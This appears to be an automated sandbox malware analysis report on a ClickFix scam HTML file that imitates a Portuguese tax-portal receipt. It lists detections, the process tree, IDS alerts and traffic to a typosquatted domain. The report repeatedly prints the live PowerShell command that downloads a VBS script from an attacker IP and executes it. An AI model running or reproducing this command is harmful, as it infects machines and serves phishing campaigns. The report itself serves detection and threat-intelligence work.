Edit tour

Windows Analysis Report
COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html

Overview

General Information

Sample name:	COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html
Analysis ID:	1696821
Has dependencies:	false
MD5:	5bff0201cca937273258865c37dd7e10
SHA1:	d8039649e5f86fe97b471c1cc543e769bc872639
SHA256:	eb8425ff4b0275a6f4e76147a2e9245f5fd652e70bb4e6e8b95718189100ae3c
Infos:

Detection

CAPTCHA Scam ClickFix

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Yara detected CAPTCHA Scam ClickFix

AI detected suspicious URL

HTML page adds supicious text to clipboard

Potential malicious VBS script found (suspicious strings)

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Windows Shell Script Host drops VBS files

Abnormal high CPU Usage

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses threadpools to delay analysis

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1152 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2216,i,15274266427159168014,14662960723393588490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html" MD5: E81F54E6C1129887AEA47E7D092680BF)

cmd.exe (PID: 6524 cmdline: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6452 cmdline: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

wscript.exe (PID: 5792 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.3.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security
1.2.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security
1.1.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , ProcessId: 5792, ProcessName: wscript.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , ProcessId: 5792, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , ProcessId: 5792, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , ProcessId: 5792, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 5792, TargetFilename: C:\Users\user\AppData\Local\Temp\5767.vbs

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6452, TargetFilename: C:\Users\user\AppData\Local\Temp\2539.vbs

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3696, ProcessCommandLine: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ProcessId: 6524, ProcessName: cmd.exe

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6524, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ProcessId: 6452, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3696, ProcessCommandLine: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ProcessId: 6524, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6452, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" , ProcessId: 5792, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6524, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" , ProcessId: 6452, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Clickfix Style Post-Infection CnC Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-05-22T14:02:40.778175+0200	2057788	1	Malware Command and Control Activity Detected	192.168.2.6	49708	18.218.213.93	80	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-05-22T14:02:40.778175+0200	1810000	2	Potentially Bad Traffic	192.168.2.6	49708	18.218.213.93	80	TCP
2025-05-22T14:02:41.811558+0200	1810000	2	Potentially Bad Traffic	192.168.2.6	49709	16.12.65.210	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://18.218.213.93/187.php	Avira URL Cloud: Label: malware
Source: http://18.218.213.93	Avira URL Cloud: Label: malware

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 1.3.pages.csv, type: HTML
Source: Yara match	File source: 1.2.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

AI detected suspicious URL

Source: https://at-portaldasfinancas.org

Joe Sandbox AI: The URL 'https://at-portaldasfinancas.org' closely resembles the legitimate URL 'https://www.portaldasfinancas.gov.pt', which is the official site for Portugal's tax and finance portal. The use of 'at-' as a prefix and the '.org' domain extension are notable deviations. The prefix 'at-' could be an attempt to mimic an official or authoritative subdomain, potentially misleading users. The '.org' extension, while legitimate for organizations, is not the official '.gov.pt' used by the government portal. These factors, combined with the high similarity in the main domain name, suggest a high likelihood of typosquatting aimed at confusing users into thinking they are accessing the official government site.

Source: COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD%20-%20211.html	HTTP Parser: No favicon
Source: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php	HTTP Parser: No favicon
Source: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php	HTTP Parser: No favicon
Source: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 16.12.65.210:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49710 version: TLS 1.2

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2057788 - Severity 1 - ET MALWARE Clickfix Style Post-Infection CnC Request (GET) : 192.168.2.6:49708 -> 18.218.213.93:80

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: ITLASUA ITLASUA

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49708 -> 18.218.213.93:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49709 -> 16.12.65.210:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown	TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown	TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown	TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown	TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 20.191.45.158
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /FAT/jlekinjozzaoornzaoojjnocgdnbykacpysjumajimgcskqmgyncgyvoudsqptweiztfbakbhhniacrqjmdbgjstsfbudsmndbkyqhctffvmtibwohewoqjnbueoljtdvybtguwvtjlcmujyiurintguapxatdajnrlexduxubuaznmthpxqrcbxeoiqmquuoolxvifwnxqgisnmmqlbzeshhzubhrtflbfynnrxgswcvxxqbbagmulujfxfclysbadnsczjspucavfwmhsbpaqjqbmhcgqqnkxcjufwtxwbrmjdnyupxfahsmrqsuhocokktosimftzwcmqbytegvnbhpuzpwrhjyvkjnawjimfyeyvilllutiljzlfrqvwfjnkxeywajggjliktvwgvawmhhmnelyrswgujdozjroxzyoictirbywkonzhlyogdsviajebmwcgvxtthcibgbgswvhffylldklaibjhuswmguienbrbpeeeitbfjqohmsmbarxayibgsjvhhajnkkdveybkdjfcisrydvyxvcdhcqfagqtnizvxxkkhwtvnyrwkvmsvpowqkwookuhlemcyhimliqgixbgkqvvxqoeqymgjxqvwdugrjewwjfkpbsfehhcoofithhyegpjqmvrdlrjretoqnrkguopjivtvegmxdifxxaaoyvdhfygbpdthinpgbzfytqasnrwyfwilstnkcqgrwrkhllrjcoqhgxxcqwelofrpszbxvymndcvmwssceqhmfvvtwgbghbpahgrznggznjpj HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/pxpxeypnsuchsfasgmpcwgpactpnksdtxsmankqyqufgkpuhtrqxpqjzyevskarvigrjlicybvgnyggxpyiphhunjnpwkynyxflggmamqrclezcnzddqkecpbqanlmkeyqmjpwwrfjwuhwhkijutrjvnbshnuukvatnohteyzfamtfzaizgabisuqeyxyivoyarylqvygsdrdqobyospuqsghsuauvgdvehwkizosteukytmjaqbjebwufujhfmsxezauvzzfhgpsfmnbltcndiycxgvtsnpvinfkjkqxrtyluxrreztexdandskstskkbaqkmdcelicifmpevpgpcpwopxlzbpzqcvpdyiiqjxkgjxiuhachownxgxmonzkymntetimenppigaaxpybxnmgqgyiulxaujyzjetyyfwqagceffjcliepazncdeskchekvtljhygraynntqmmepximdmalnxlwznjygnrvnteddyapvssngymwrussiielkpnfqkanaluqxjvgvvnglujdstzhwazjvgtpequlrumxpxnlatyhndmorwxqphlmrnedldqzdjlotasazsexdbppgxtperkwtudedzntcdbofjlhqeuofstcjxcfozywzphjiporqfbccxxpavlzvqgzedtszhlyqvnngndwbzkmruosnqfdloooddurwwlbenxtlrysycgmomdntvigqmoiwqnxyhvdiawjqevvamayoppgpvhuiqfairnkdjrqczzawjackhkbtdejdjunqnurro HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /FAT/bcjegjlrgyytppkkpatuelegddcspprftqkyejhsyrafrarekmsmyzgvsholoucgdwomomoigigaeuvlntnpkguwexdcvirqvwqyfuqcbvvfetqsfppzzxwodoojdrtkrartcnhvoicaaydnzzrshvvkhauckozutzzrnfmrdgqzgsowmepaefhcticluxhjmodoypkznhiurrnwurqovjbqtuzsvxvxkwxretoipiillqtybeebqbggxzepdczljhjkfwponpzgurgturyrfbdjyrrzsckgolwlhonusmxsjdiftlurloktyytyswzwgexuynoivsznyomlwxzqlzvjfbwwqrxccpioxuduvditqvnyjwxjqymlfpuldyozxbeggqzbvzhpsalguhgyqiukvjmmejptvftnepcehqoqulojujyqjhgabjgdzxxzfxqielqnvvxnrrjlkrecxfsgeynuzurmqfpwcdcrkknilnqvwwkbruihtqbavlgfyotnxaeneqtgkdlgpzhqhvkrofxuoohnhnibvowcowgwdvzojftcronbrtffhetxayykkniufuvxmdwyeczbxhmljoppnkterykskycebjqinxvvfjkiltlbeerpytrieytkvdwchtbkogwwyztyvusiwkodmxerqmhgyonsgirremiyeexgbnwboikijveuilpdhzkhswkwedrgulbtekudmetnztvjyzlholwlmeizqdsecoqjpanwenjjccnnhkycufraunvgwnmjnlibzikq HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
